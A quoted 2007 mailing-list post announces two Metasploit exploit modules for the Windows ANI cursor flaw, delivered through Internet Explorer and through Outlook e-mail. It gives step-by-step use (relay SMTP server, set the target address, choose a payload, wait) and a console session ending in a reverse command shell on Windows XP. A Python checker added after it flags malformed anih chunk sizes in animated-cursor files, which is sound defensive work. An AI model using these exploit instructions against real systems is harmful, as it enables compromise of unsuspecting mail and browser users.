> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf
> Of H D Moore
> Sent: Monday, April 02, 2007 11:03 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Metasploit vs ANI
>
> Two new exploit modules are available for version 3.0 of the Metasploit
> Framework. These modules can be obtained by using the 'Online Update'
> feature in Windows and the 'svn update' command on Unix-like systems.
>
> Matt Miller posted to the Metasploit Blog about our ANI efforts:
> http://blog.metasploit.com/
>
> The two exploits can be viewed in the svn repository at metasploit.com:
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb
>
> The first module exploits the ANI flaw through Internet Explorer. It uses
> multiple icon files referenced from a single HTML page. This allows
> client-side brute forcing without resorting to javascript. This module
> will execute code on Windows 2000, Windows XP, and Windows Vista using
> the default target. As mentioned in the blog, a command shell is not
> directly accessible on Vista, but the Meterpreter payload can be used to
> bust out of the low-privileged process :-)
>
> The second module exploits the ANI flaw through Outlook and Outlook
> Express. It sends a multipart MIME e-mail that contains multiple icon
> files referenced from an HTML message. This allows brute forcing of the
> correct target via the mail reader, all without any form of client-side
> scripting. To use this module, point RHOST and RPORT at an SMTP server
> that will relay your email. Set the MAILFROM and MAILTO options, select a
> payload, launch the exploit, and wait for your payload to execute.
>
> An example session from the e-mail based exploit module:
>
> msf exploit(ani_loadimage_chunksize) > exploit
> [*] Started reverse handler
> [*] Connecting to SMTP server localhost:20025...
> [*] SMTP: 220 slug.metasploit.com ESMTP
> [*] SMTP: 250-slug.metasploit.com
> 250-PIPELINING
> 250-8BITMIME
> 250-AUTH LOGIN PLAIN CRAM-MD5
> 250 SIZE 0
> [*] SMTP: 250 ok
> [*] SMTP: 250 ok
> [*] Sending the message (404759 bytes)...
> [*] SMTP: 354 go ahead
> [*] SMTP: 250 ok 1175497222 qp 12648
> [*] Closing the connection...
> [*] SMTP: 221 slug.metasploit.com
> [*] Waiting for a payload session (backgrounding)...
> [*] Exploit running as background job.
> msf exploit(ani_loadimage_chunksize) >
>
> [*] Command shell session 1 opened (192.168.0.127:4444 ->
> 192.168.0.127:37299)
>
> msf exploit(ani_loadimage_chunksize) > sessions -i 1
> [*] Starting interaction with 1...
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> C:\program files\Outlook Express>
>
> Enjoy!
>
> - The Metasploit Staff
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
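The defensive counterpart to the post above, added here as an example and not code from the post, from Metasploit, or from the module it announces: the module name `ani_loadimage_chunksize` points at the chunk-size field of the animated-cursor format, and a mail gateway or file scanner that distrusts that field is the natural check. The Python below walks the RIFF chunks of an .ani blob, descends into LIST containers, and flags any `anih` chunk whose declared size is not the 36 bytes of the documented ANIHEADER structure, as well as any chunk whose declared size runs past the end of its container. It assumes only the documented RIFF/ACON layout (RIFF header, ACON form type, word-aligned chunks, frames inside LIST chunks); the sample files are constructed inline by `build_riff` and are not real cursors or exploit files.

```python
import struct

# sizeof(ANIHEADER) in the documented RIFF ACON format: nine DWORD fields.
ANIH_EXPECTED_SIZE = 36


def iter_chunks(data, start, end):
    """Yield (fourcc, payload_offset, declared_size) for each chunk in data[start:end].

    Chunks are word-aligned, so an odd-sized chunk is followed by one pad byte.
    A chunk whose declared size runs past `end` is yielded once (so the caller
    can flag it) and then iteration stops, because the rest of the layout
    cannot be trusted.
    """
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        payload = pos + 8
        yield fourcc, payload, size
        if size > end - payload:
            return
        pos = payload + size + (size & 1)


def check_ani(data):
    """Return a list of findings (strings) for an animated-cursor blob.

    An empty list means the outer RIFF structure is consistent and every
    anih chunk, top-level or inside a LIST, declares exactly 36 bytes.
    """
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF":
        return ["not a RIFF file"]
    riff_size = struct.unpack_from("<I", data, 4)[0]
    if data[8:12] != b"ACON":
        return ["RIFF form type is %r, not ACON" % data[8:12]]
    if riff_size + 8 > len(data):
        findings.append("RIFF size %d exceeds file length %d" % (riff_size + 8, len(data)))
    end = min(len(data), riff_size + 8)

    def walk(start, stop, depth):
        for fourcc, payload, size in iter_chunks(data, start, stop):
            if size > stop - payload:
                findings.append("chunk %r at offset %d declares %d bytes but only %d remain"
                                % (fourcc, payload - 8, size, stop - payload))
            if fourcc == b"anih" and size != ANIH_EXPECTED_SIZE:
                findings.append("anih chunk at offset %d declares %d bytes, expected %d"
                                % (payload - 8, size, ANIH_EXPECTED_SIZE))
            elif fourcc == b"LIST" and depth < 4 and 4 <= size <= stop - payload:
                # LIST payload is a 4-byte list type followed by sub-chunks.
                walk(payload + 4, payload + size, depth + 1)

    walk(12, end, 0)
    return findings


def build_riff(chunks):
    """Constructed-sample builder (not a real cursor writer).

    chunks: list of (fourcc, payload, declared_size); declared_size None means
    "declare the true payload length", anything else writes a lying size field.
    """
    body = b"ACON"
    for fourcc, payload, declared in chunks:
        size = len(payload) if declared is None else declared
        body += fourcc + struct.pack("<I", size) + payload
        if len(payload) & 1:
            body += b"\0"  # word alignment pad
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: a well-formed file, and three malformed variants.
GOOD_ANI = build_riff([
    (b"anih", bytes(36), None),
    (b"LIST", b"fram" + b"icon" + struct.pack("<I", 6) + bytes(6), None),
])
OVERSIZED_DECLARED_ANI = build_riff([(b"anih", bytes(36), 0x1000)])
LONG_ANIH_ANI = build_riff([(b"anih", bytes(100), None)])
NESTED_BAD_ANIH_ANI = build_riff([
    (b"anih", bytes(36), None),
    (b"LIST", b"fram" + b"anih" + struct.pack("<I", 200) + bytes(200), None),
])

if __name__ == "__main__":
    for name, blob in [("good", GOOD_ANI), ("oversized", OVERSIZED_DECLARED_ANI),
                       ("long anih", LONG_ANIH_ANI), ("nested", NESTED_BAD_ANIH_ANI)]:
        print(name, check_ani(blob) or "ok")
```

The check deliberately keeps walking after a bad RIFF size field and descends into LIST chunks, because a filter that only inspects the first `anih` it meets at top level is easy to route around; it also treats a declared size larger than the remaining bytes as a finding in its own right, since a truncated-on-purpose chunk is as suspicious as an oversized one.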